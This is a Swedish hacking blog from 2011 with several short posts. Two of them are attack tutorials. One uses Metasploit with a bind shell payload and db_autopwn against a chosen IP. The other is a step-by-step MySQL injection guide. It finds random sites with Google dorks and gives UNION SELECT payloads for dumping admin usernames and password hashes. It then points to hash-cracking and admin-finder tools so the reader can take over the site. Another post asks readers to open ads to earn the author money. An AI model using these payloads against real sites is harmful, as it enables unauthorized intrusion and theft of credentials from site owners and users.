fredag 20 maj 2011

Problem

internet och dator problem...
hårddisk problem igen och internet fungerar inte riktigt som det ska.

Jag tar en "semester" från bloggen ett tag och återkommer den 31 tisdag.

Beklagar om ni förväntade er något just nu, lovar att lägga upp det iaf!

Ha det bra tills dess!

MvH/
Ninja

söndag 15 maj 2011

Tackar alla..

Jag tackar alla som har hjälpt mig och uppskattar den hjälp jag har fått hittills.
Som tack kommer jag visa en SQL-injection (Video) som kommer in i det här inlägget lite senare eftersom jag ska se till att det blir lite bra också :)

Frågor och funderingar tas gladligen emot och lämna gärna en kommentar om hur ni tycker sidan kan förbättras eller uppdateras.  vill veta vad ni alla tycker :)

MvH/

Ninja :)

måndag 9 maj 2011

Metaspl0it

Idag ska vi gå igenom metasploit.
Metasploit är ett säkerhetsverktyg som hittar svagheter, vi kommer använda det för att hitta säkerhetshål i måldatorn.

Vad behöver vi för det här? vilka os fungerar den på?
Den fungerar på Olika linux distributioner (Finns redan i backtrack) och även för windows för dom som vill testa där :) (notera att om du är windows användare måste du avaktivera ditt antivirus)

Alla kan besöka deras hemsida http://www.metasploit.com/
Läs lite innan ni börjar så ni får en uppfattning om vad vi kommer göra!

För er på ubuntu och windows kan ladda hem programmet från deras hemsida, på windows är det bara att avaktivera antivirus och på linux behövs det lite mer men allt står på deras hemsida.

Hela programmet är i text form och inte i grafiskt gränssnitt.

När ni väl har installerat det så kan ni starta upp det. ( skriv "msfconsole"  i backtrack för att starta, och i ubuntu är det oftast sökvägen sen ./msfconsole, det kan variera hur ni har det men allt står på deras hemsida)

GLÖM INTE ATT VARA ROOT NÄR NI BÖRJAR MED ALLT!

vi kommer börja med att uppdatera metasploit
* svn update
* msfupdate
det skriver ni i metasploit fönstret.

Förhoppningsvis har allt gått bra annars rekomenderar jag er att Googla eller att söka på något forum, ni måste lära er att klara av saker själva! :)

tänk att en Payload är en instans på måldatorn som går att aktivera och en exploit är det säkerhetshålet som gör att vi nu kan aktivera det.
 det är kanske inte riktigt är det, men så att ni kan förstå så är det ett bra exempel.

Show options = visar alternativ

om ni ska använda en viss payload så kan vi skriva:
set PAYLOAD generic/shell_bind_tcp (då använder vi generic/shell_bind_tcp payloaden)
om vi vill använda någon annan payload så skriv bara "show payloads" så får ni se alla.

set RHOST = då sätter vi måldatorns ip tex,  Exempel: set RHOST 192.168.0.5
set LHOST = lokala ip:n, exempel: set LHOST 192.168.0.4
set LPORT = porten som vi väljer som Payloaden kommer öppna . exepel: set LPORT 443
exploit = du aktiverar det hela i stort sätt.

Vi tar som ett exempel:

set RHOST 192.168.0.5
set LHOST 192.168.0.4
set LPORT 443
set PAYLOAD generic/shell_bind_tcp
exploit

ni kan använda olika exploits och olika payloads, bara att utforska och försök mesta del på egen hand. (så ni lär er)

Kommer även visa er ett enklare i nästa inlägg (imorgon) och kanske effektivare sätt men vill att ni ska förstå det ovan innan jag visar nästa steg.


||||||||||||||||||||||||||||||||||||||||   EDIT|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Det är inte så himla säkert att man hittar något säkerhetshål om nu den du attackerar har bra antivirus + uppdaterat system.
Vilket inte kommer resulterat några sårbarheter.

Däremot! istället för att skriva och pröva alla olika 300 sårbarigheter (payloads/exploits)
så kan vi köra alla i en enda instans, enkelt och effektivt.

Låt oss säga att vi sitter i ett lokalt nätverk.
Först så skapar vi en datorbas (vilket ni kan ta bort om ni vill efter ni är klara)

db_create "namn"    

sen väljer vi våran "driver" vilket kommer vara:

db_driver sqlite3

Nu kan du (om du vill och behöver) öppna ett till terminal fönster och köra nmap så du kan se alla datorer i nätverket. (se tidigare inlägg för beskrivning för nmap)

Välj vilken ip du ska köra attacken mot och skriv (i metasploit fönstret) nmap "ip:n du valt"

tex: nmap 192.168.0.76

sen skriver du simpelt nog:

db_autopwn -p -t -e

så kör du alla tänkbara sårbarheter mot den ip du skrev.

Det ska vara allt och skriv i kommentarerna om du behöver hjälp


|||| EXEMPEL||||||||||||||||

db_create hej
db_driver sqlite3
db_nmap 192.168.0.65
db_autopwn -p -t- e

sessions -i

(om du lyckas ser du det och kan gå vidare genom "sessions")
(som jag skrivit förut att ni kan hjälpa mig att hålla uppe bloggen genom att trycka upp min reklam på sidan i nya flikar och låta dom vara där ett tag sen stänga dom, det hjälper mig jätte mycket och tackar alla som stödjer mig)

MvH/

Ninja :)

fredag 6 maj 2011

Vad vill du lära dig?

Skriv i kommentarerna vad du vill lära dig så  köra jag en guide på det.

MvH/

Ninja

onsdag 4 maj 2011

Hur går det för alla? lite respons!
La ner mycket info i sista posten!!

Stöd gärna mig med det jag skrivit i föregångna inlägg (reklam och stöd)

MvH/

Ninja

måndag 2 maj 2011

MySQL Injection -

MySQL Injection är den allra vanligaste metoden för att hacka hemsidor, för att detta ska fungera
så behövs det dock att hemsidan som ska hackas kör MySQL.
MySQL Injections går ut på att du skickar in kommandon till databasen för att få ut den data du vill åt,
som t.ex användare på sidan, admins eller vad som helst.
Mitt tips till dig är att börja lära dig om MySQL redan innan du påbörjar de olika steg i denna guide
eller under tiden så att du vet vad som händer och vad de olika kommandona gör.

För att hitta en random sida att pröva detta på så kan man använda sökmotorn google och ange olika
google dorks, som t.ex:
* inurl:index.php?newsID=
* inurl:index.php?productID=
* inurl:index.php?articleID=
* inurl:index.php?fileID=

etc.

För att kolla om sidan är sårbar för SQLi (Förkortning för MySQL Injection), så kan du sätta dit
' i slutet av länken efter ID= dvs, eller så kan du testa and 1=2.
Ungefär såhär:
http://URL.com/index.php?newsID=1' eller
http://URL.com/index.php?newsID=1 and 1=2

Om sidan laddas upp med ett SQL error eller om sidan laddas konstigt så kan det vara en sårbarhet
som kan utnyttjas.

Sedan så måste vi räkna antalet kolumner, sudda ut ' eller and 1=2 och skriv in order by 1-- efteråt,
då bör det se ut såhär:
http://URL.com/index.php?newsID=1 order by 1--

Om sidan laddades normalt som den ska, så är det bra, testa sedan att ändra värdet från 1 till 99,
laddas sidan konstigt eller om du får ett error som som säger att kolumen 99 inte finns så ändra värdet
till 2 och fortsätt uppåt tills sidan laddas konstigt.
Värdet på siffran som sist gjorde så sidan laddades normalt är den vi är ute efter, låt oss säga
att sidan slutade laddas normalt vid värdet 7.
Då finns det 7 kolumner.
http://URL.com/index.php?newsID=1 order by 1-- <- normalt
http://URL.com/index.php?newsID=1 order by 2-- <- normalt
http://URL.com/index.php?newsID=1 order by 3-- <- normalt
http://URL.com/index.php?newsID=1 order by 4-- <- normalt
http://URL.com/index.php?newsID=1 order by 5-- <- normalt
http://URL.com/index.php?newsID=1 order by 6-- <- normalt
http://URL.com/index.php?newsID=1 order by 7-- <- normalt
http://URL.com/index.php?newsID=1 order by 8-- <- onormalt/error

Sedan så gör ett mellan rum mellan = och id:
http://URL.com/index.php?newsID=-1

Sedan efter 1:an skriv union select 1,2,3,4 etc tills antalet kolumner som fanns på sidan,
på denna sida fanns det 7 kolumner som vi kunde konstantera tidigare:
http://URL.com/index.php?newsID=-1 union select 1,2,3,4,5,6,7--

Tryck sedan enter, då bör det komma upp små siffror på sidan, låt oss säga att siffrorna 3 och 5 kom upp,
då skriver vi concat(table_name,0x3a,column_name) på någon av 3 och 5.
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7--

Sedan efter 7 skriver vi from information_schema.columns where table_schema=database()-- :
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()--

Enkelt sagt vad detta gör är att den ger oss vilka tables och columns som finns i databasen
information_schema.

Efter detta så bör det ha kommit upp t.ex
users:user_id
För att bläddra skriv limit 0,1 innan -- och ändra värdet på 0:an så kommer det upp annan data som kan
vara dig till lags:

http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()limit 0,1--
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()limit 1,1--
etc.

För att lista alla alternativ ändra concat(table_name,0x3a,column_name) till group_concat(table_name,0x3a,
column_name).
Leta sedan efter den information som kan vara dig till lags, t.ex som
users:users_id
users:password
users:username

Eller
admin:admin_id
admin:username
admin:password

Vi säger att vi vill åt admin-kontona, då ändrar vi table_name i concat till username,
och columns_name till password, och sedan from information_schema.columns where table_schema=database()--
till from admin-- :

http://URL.com/index.php?newsID=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7 from admin--
Då bör du ha fått upp ett/flera av adminkontona, för att bläddra om endast ett resultat visas använd
limit här igen.
De flesta är sidor som du kommer stöta på så kommer lösenorden vara md5 hashade, för att få tag på lösenordet
så kan du använda denna sida:
http://hash.insidepro.com
Skriv in hashen i rutan och sedan verifiationskoden och tryck search.

Sedan är det bara att hitta admin sidan, för att hitta admin sidan så kan du använda detta verktyg som är
kodat i perl:
http://ankfest.com/DOWNLOADS/ludwig.pl, för att scriptet ska fungera så måste du ha perl installerat
på datorn.
Annars finns ett program som heter adminfinder, som jag dock inte har orkat leta upp ännu.

Sedan är det bara logga in med valfritt admin-konto på sidan och göra vad fan du vill.

MvH/

Ninja